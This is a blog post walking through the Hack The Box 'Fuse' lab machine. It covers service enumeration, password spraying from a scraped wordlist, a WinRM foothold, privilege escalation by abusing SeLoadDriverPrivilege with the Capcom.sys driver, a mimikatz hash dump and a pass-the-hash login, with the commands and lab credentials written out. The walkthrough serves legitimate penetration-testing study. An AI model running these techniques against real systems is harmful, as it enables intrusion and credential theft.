<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox: Fuse write-up | GoDiego</title><meta name="generator" content="Jekyll v4.0.1" /><meta property="og:title" content="HackTheBox: Fuse write-up" /><meta name="author" content="Diego Bernal Adelantado" /><meta property="og:locale" content="en_US" /><meta name="description" content="Windows box and enumeration! Fuse combines a thorough exploration of different services to gather information and then use a password spraying attack to get a foothold into the system, after that a permissions misconfig allows us to get admin!" /><meta property="og:description" content="Windows box and enumeration! Fuse combines a thorough exploration of different services to gather information and then use a password spraying attack to get a foothold into the system, after that a permissions misconfig allows us to get admin!" /><link rel="canonical" href="https://diego95root.github.io/posts/Fuse/" /><meta property="og:url" content="https://diego95root.github.io/posts/Fuse/" /><meta property="og:site_name" content="GoDiego" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-08-21T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox: Fuse write-up" /><meta name="twitter:site" content="@secfaults" /><meta name="twitter:creator" content="@Diego Bernal Adelantado" /> <script type="application/ld+json"> {"@type":"BlogPosting","headline":"HackTheBox: Fuse write-up","dateModified":"2020-08-21T00:00:00+02:00","datePublished":"2020-08-21T00:00:00+02:00","url":"https://diego95root.github.io/posts/Fuse/","mainEntityOfPage":{"@type":"WebPage","@id":"https://diego95root.github.io/posts/Fuse/"},"author":{"@type":"Person","name":"Diego Bernal Adelantado"},"description":"Windows box and enumeration! Fuse combines a thorough exploration of different services to gather information and then use a password spraying attack to get a foothold into the system, after that a permissions misconfig allows us to get admin!","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><meta name="twitter:image" content="/assets/img/favicons/favicon.ico" /><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><meta name="google-site-verification" content="H84_zouPIHmurw2-AF7oHrWvvqJ1HhxxPpp1B6Vjpx4" /><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"></script> <script src="https://polyfill.io/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js" async crossorigin="anonymous"></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/favicons/logo.png" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">GoDiego</a></div><div id="site-subtitle" class="font-italic">Student, Bug Hunter, Security Enthusiast</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/timeline/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>TIMELINE</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT ME</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/diego95root" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/secfaults" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/diego-bernal-adelantado" target="_blank"> <i class="fab fa-linkedin"></i> </a> <a href="https://www.hackthebox.eu/home/users/profile/31531" target="_blank"> <i class="fas fa-cube"></i> </a> <a href=" javascript:window.open('mailto:' + ['diegobernal0905','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HackTheBox: Fuse write-up</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox: Fuse write-up</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Fri, Aug 21, 2020, 12:00 AM +0200"> Aug 21, 2020 <i class="unloaded">2020-08-21T00:00:00+02:00</i> </span> by <span class="author"> Diego Bernal Adelantado </span></div><div> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Oct 31, 2020, 8:02 PM +0000"> Oct 31, 2020 <i class="unloaded">2020-10-31T21:02:07+01:00</i> </span></div></div><div class="post-content"> <img src="https://www.hackthebox.eu/storage/avatars/ca7a993af1eef2b5676f39dccd8fbb2f.png"><h1 id="hack-the-box-fuse-machine-write-up">Hack The Box: Fuse machine write-up</h1><p>Fuse was a Windows box that I found to be pretty complex despite it’s medium difficulty rating. It is mostly based on thorough enumeration on different services, like RPC and SMB, and then using password spraying to find valid credentials for the list of enumerated users. Once in, we quickly realise the privilege escalation is around a misconfigured permission which lets us load drivers and execute them as administrator.</p><p>Let’s dig in! The IP of the machine is <code class="highlighter-rouge">10.10.10.193</code> and, as always, I add <code class="highlighter-rouge">fuse.htb</code> as an entry to my <code class="highlighter-rouge">/etc/hosts</code> file .</p><h2 id="enumeration">Enumeration</h2><p>I start by enumerating open ports to discover the services running in the machine. I fire up nmap:</p><p><em>Result of nmap scan</em></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
</pre><td class="rouge-code"><pre># Nmap 7.80 scan initiated Sun Jul  5 18:39:18 2020 as: nmap -v -sV -sC -oA nmap/initial fuse.htb
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.050s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-05 17:00:00Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=5F020247%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m30s, deviation: 4h02m30s, median: 20m29s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-07-05T10:02:22-07:00
| smb-security-mode:
|   account_used: &lt;blank&gt;
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-05T17:02:21
|_  start_date: 2020-07-05T15:39:41

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  5 18:44:30 2020 -- 1 IP address (1 host up) scanned in 312.01 seconds
</pre></table></code></div></div><p>Quite a lot of ports open, amongst the most interesting ones 80 (HTTP), 135 (RPC), 389 / 3268 (LDAP) and 139 / 445 (SMB). I’ll start by checking out the web server.</p><h3 id="port-80-enumeration">Port 80 enumeration</h3><p>When trying to access <code class="highlighter-rouge">fuse.htb</code> on my browser I got an error, which was because the server is configured to redirect to <code class="highlighter-rouge">fuse.fabricorp.local</code>. Therefore I just added <code class="highlighter-rouge">fuse.fabricorp.local</code> to my <code class="highlighter-rouge">/etc/hosts</code> file to point to the machine IP and could access it.</p><p><em>Initial redirect</em></p><p><img src="/assets/posts_details/Fuse/images/redirect.png" alt="Img" /></p><p><em>PaperCut software</em></p><p><img src="/assets/posts_details/Fuse/images/website.png" alt="Img" /></p><p>Interesting! There is PaperCut installed, so I started wandering around to see if there was anything interesting and found different usernames, which I added to a wordlist for later use. I called it <code class="highlighter-rouge">users.txt</code>.</p><p><em>Enumerated users from different documents</em></p><p><img src="/assets/posts_details/Fuse/images/doc1.png" alt="Img" /></p><p><img src="/assets/posts_details/Fuse/images/doc2.png" alt="Img" /></p><p><img src="/assets/posts_details/Fuse/images/doc3.png" alt="Img" /></p><p>My <code class="highlighter-rouge">users.txt</code> file had then the following contents:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>Administrator
bhult
sthompson
tlavel
pmerton
</pre></table></code></div></div><p>I had found users, okay, but where were the passwords? I ran some bruteforce scans but nothing. Then moved on and tried to enumerate LDAP to see if there was anything.</p><h3 id="ldap-enumeration">LDAP enumeration</h3><p>I used <code class="highlighter-rouge">ldapsearch</code> to enumerate the box.</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre>┌─[htb@parrot]─[~/htb/fuse]
└──╼ <span class="nv">$ </span>ldapsearch <span class="nt">-x</span> <span class="nt">-h</span> 10.10.10.193 <span class="nt">-p</span> 389 <span class="nt">-s</span> base namingcontexts
<span class="c"># extended LDIF</span>
<span class="c">#</span>
<span class="c"># LDAPv3</span>
<span class="c"># base &lt;&gt; (default) with scope baseObject</span>
<span class="c"># filter: (objectclass=*)</span>
<span class="c"># requesting: namingcontexts</span>
<span class="c">#</span>

<span class="c">#</span>
dn:
namingContexts: <span class="nv">DC</span><span class="o">=</span>fabricorp,DC<span class="o">=</span><span class="nb">local
</span>namingContexts: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>fabricorp,DC<span class="o">=</span><span class="nb">local
</span>namingContexts: <span class="nv">CN</span><span class="o">=</span>Schema,CN<span class="o">=</span>Configuration,DC<span class="o">=</span>fabricorp,DC<span class="o">=</span><span class="nb">local
</span>namingContexts: <span class="nv">DC</span><span class="o">=</span>DomainDnsZones,DC<span class="o">=</span>fabricorp,DC<span class="o">=</span><span class="nb">local
</span>namingContexts: <span class="nv">DC</span><span class="o">=</span>ForestDnsZones,DC<span class="o">=</span>fabricorp,DC<span class="o">=</span><span class="nb">local</span>

<span class="c"># search result</span>
search: 2
result: 0 Success

<span class="c"># numResponses: 2</span>
<span class="c"># numEntries: 1</span>
</pre></table></code></div></div><p>Then, I try to extract the information but no luck…</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>┌─[htb@parrot]─[~/htb/fuse]
└──╼ <span class="nv">$ </span>ldapsearch <span class="nt">-h</span> 10.10.10.193 <span class="nt">-p</span> 389 <span class="nt">-x</span> <span class="nt">-b</span> <span class="s2">"dc=fuse,dc=htb"</span>
<span class="c"># extended LDIF</span>
<span class="c">#</span>
<span class="c"># LDAPv3</span>
<span class="c"># base &lt;dc=fuse,dc=htb&gt; with scope subtree</span>
<span class="c"># filter: (objectclass=*)</span>
<span class="c"># requesting: ALL</span>
<span class="c">#</span>

<span class="c"># search result</span>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A6C, comment: In order to perform this opera
 tion a successful <span class="nb">bind </span>must be completed on the connection., data 0, v3839

<span class="c"># numResponses: 1</span>
</pre></table></code></div></div><h3 id="smb-enumeration">SMB enumeration</h3><p>I then tried with anonymous SMB login but no luck either.</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌─[htb@parrot]─[~/htb/fuse]
└──╼ <span class="nv">$ </span>smbclient <span class="nt">-L</span> //10.10.10.193 <span class="nt">-N</span>
Anonymous login successful

	Sharename       Type      Comment
	<span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
Reconnecting with SMB1 <span class="k">for </span>workgroup listing.
do_connect: Connection to 10.10.10.193 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span>
Unable to connect with SMB1 <span class="nt">--</span> no workgroup available
</pre></table></code></div></div><p>Hmmmm, nothing came up so I went back to the web server.</p><h3 id="papercut-enumeration-more-thorough">PaperCut enumeration (more thorough)</h3><p>I thought maybe the password was somewhere in the name of the documents or something so I decided to use <code class="highlighter-rouge">cewl</code> to build a wordlist and do some password spraying with it on the different services:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cewl -d 5 -m 3 --with-numbers -w passwords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm
</pre></table></code></div></div><p>The command can be broken down like this:</p><ul><li><code class="highlighter-rouge">-d 5</code> for a depth to spider the website of 5.</li><li><code class="highlighter-rouge">-m 3</code> for a minimum word length of 3.</li><li><code class="highlighter-rouge">--with-numbers</code> to include words that contain numbers, as passwords are usually alphanumeric.</li></ul><h3 id="smb-password-spraying-and-enumeration">SMB password spraying and enumeration</h3><p>Once with the wordlist I used the tool <code class="highlighter-rouge">CrackMapExec</code> (abbreviated as <code class="highlighter-rouge">cme</code> in the binary) to bruteforce SMB:</p><p><em>Enumerating users in SMB</em></p><p><img src="/assets/posts_details/Fuse/images/smb1.png" alt="Img" /></p><p>Good! We got two hits: <code class="highlighter-rouge">tlavel</code> and <code class="highlighter-rouge">bhult</code>; both using the same password: <code class="highlighter-rouge">Fabricorp01</code>. However, the <code class="highlighter-rouge">NT_STATUS_PASSWORD_MUST_CHANGE</code> is weird…</p><p><em>Password not working</em></p><p><img src="/assets/posts_details/Fuse/images/smb2.png" alt="Img" /></p><p>I googled around and found that it’s possible to change the SMB password of a user remotely if we know the old password, good! We can do that with <code class="highlighter-rouge">smbpasswd</code>:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbpasswd -r 10.10.10.193 -U tlavel
</pre></table></code></div></div><p>And we are able to list shares!</p><p><em>Password changed and able to list shares</em></p><p><img src="/assets/posts_details/Fuse/images/smb3.png" alt="Img" /></p><p>To quickly see everything I changed to <code class="highlighter-rouge">smbmap</code> and used the recursive flag <code class="highlighter-rouge">-R</code>:</p><p><em>Using smbmap to view all the files</em></p><p><img src="/assets/posts_details/Fuse/images/smb4.png" alt="Img" /></p><p>However, I couldn’t find anything too juicy… I did note though that there was a lot of printer stuff there so it may turn out to be useful later.</p><h3 id="rpc-enumeration">RPC enumeration</h3><p>I remembered that I hadn’t yet taken a look at this service because I didn’t have any working credentials, but now I did! The first thing I did when I got the prompt was use <code class="highlighter-rouge">enumprinters</code>, as I had the printers stuff I had seen before fresh and thought there could be something. Then I checked if there were any more users. Turned out both assumptions were right!</p><p><em>RPC enumeration yields a password and more usernames</em></p><p><img src="/assets/posts_details/Fuse/images/rpc.png" alt="Img" /></p><p>Finally a password: <code class="highlighter-rouge">$fab@s3Rv1ce$1</code>! I added the users to my <code class="highlighter-rouge">users.txt</code> and tried to use a password spraying attack once again on SMB: <code class="highlighter-rouge">svc-print:$fab@s3Rv1ce$1</code> was valid. However, no new information.</p><p><em>New valid credentials for SMB</em></p><p><img src="/assets/posts_details/Fuse/images/smb5.png" alt="Img" /></p><h2 id="getting-user">Getting user</h2><h2 id="winrm-foothold-into-the-system">WinRM: foothold into the system</h2><p>After trying SMB with the new information I saw in <code class="highlighter-rouge">cme</code>’s help menu the option to try with the <code class="highlighter-rouge">winrm</code> service. I did and, to my surprise, the previous set of credentials worked!</p><p><em>CrackMapExec output on winrm</em></p><p><img src="/assets/posts_details/Fuse/images/winrm1.png" alt="Img" /></p><p>Using <code class="highlighter-rouge">evil-winrm</code> I got a shell and was able to read the user flag.</p><p><em>User shell and flag with evil-winrm</em></p><p><img src="/assets/posts_details/Fuse/images/winrm2.png" alt="Img" /></p><h2 id="privilege-escalation">Privilege escalation</h2><h3 id="windows-enumeration">Windows enumeration</h3><p>I started off using <code class="highlighter-rouge">whoami /all</code> to get all the possible information about the user.</p><p><em>Information on the current user</em></p><p><img src="/assets/posts_details/Fuse/images/user1.png" alt="Img" /></p><p><img src="/assets/posts_details/Fuse/images/user2.png" alt="Img" /></p><p>Something thing was odd: one of the privileges enabled wasn’t normal:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
</pre></table></code></div></div><blockquote><p>We could have also used <code class="highlighter-rouge">whoami /priv</code> to just get the privileges</p></blockquote><p>Another thing I noticed was a file called <code class="highlighter-rouge">readme.txt</code> on the root of the filesystem which talks about some issue (in the end I didn’t use this information at all).</p><p><em>File containing hints (apparently)</em></p><p><img src="/assets/posts_details/Fuse/images/hint.png" alt="Img" /></p><h2 id="exploit">Exploit</h2><p>I googled around and found a nice article (<a href="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/">https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/</a>) that explained how it was possible to do a privilege escalation based on loading a driver from an unprivileged user account. One of the caveats of the exploit is that we need to choose a signed driver that has a vulnerability.</p><p><a href="https://github.com/TarlogicSecurity/EoPLoadDriver/">This</a> and <a href="https://github.com/tandasat/ExploitCapcom">this other one</a> repositories contain the necessary steps required for the exploitation. The first one contains the proof of concept for abusing SeLoadDriverPrivilege while the other one is a standalone exploit for a vulnerable feature in the driver Capcom.sys.</p><p>I compiled both and copied them to the system, ending up with the following files (<code class="highlighter-rouge">mimikatz.exe</code> is for getting the NTLM Hash of the administrator afterwards).</p><p><em>Files moved to the system</em></p><p><img src="/assets/posts_details/Fuse/images/files.png" alt="Img" /></p><p>Then, to execute the exploit we just need two commands:</p><ul><li><code class="highlighter-rouge">.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys</code></li><li><code class="highlighter-rouge">.\ExploitCapcom_modded.exe</code></li></ul><p><em>Commands to get a root shell</em></p><p><img src="/assets/posts_details/Fuse/images/root1.png" alt="Img" /></p><p>Then I used <code class="highlighter-rouge">mimikatz</code> to get the hash of the administrator:</p><p><em>Getting NTLM hash of the administrator</em></p><p><img src="/assets/posts_details/Fuse/images/ntlm.png" alt="Img" /></p><p>If you’re wondering why, it was because evil-winrm offers the possibility of authenticating with a hash (aka a pass-the-hash attack), so we can run <code class="highlighter-rouge">evil-winrm -i 10.10.10.193 -u administrator -H '370ddcf45959b2293427baa70376e14e'</code> and get an administrator shell!</p><p><em>Remote access as administrator using hash</em></p><p><img src="/assets/posts_details/Fuse/images/root2.png" alt="Img" /></p><p>This is everything, I hope you enjoyed the writeup and learned something new! If you liked it you can give me respect on Hack The Box through the following link: <a href="https://www.hackthebox.eu/home/users/profile/31531">https://www.hackthebox.eu/home/users/profile/31531</a>. Until next time!</p><hr /><p><em>Diego Bernal Adelantado</em></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hack-the-box/'>Hack The Box</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hack-the-box/" class="post-tag no-text-decoration" >Hack The Box</a> <a href="/tags/pentesting/" class="post-tag no-text-decoration" >Pentesting</a> <a href="/tags/rpc/" class="post-tag no-text-decoration" >RPC</a> <a href="/tags/smb/" class="post-tag no-text-decoration" >SMB</a> <a href="/tags/winrm/" class="post-tag no-text-decoration" >WinRM</a> <a href="/tags/windows/" class="post-tag no-text-decoration" >Windows</a> <a href="/tags/permissions/" class="post-tag no-text-decoration" >Permissions</a> <a href="/tags/enumeration/" class="post-tag no-text-decoration" >Enumeration</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 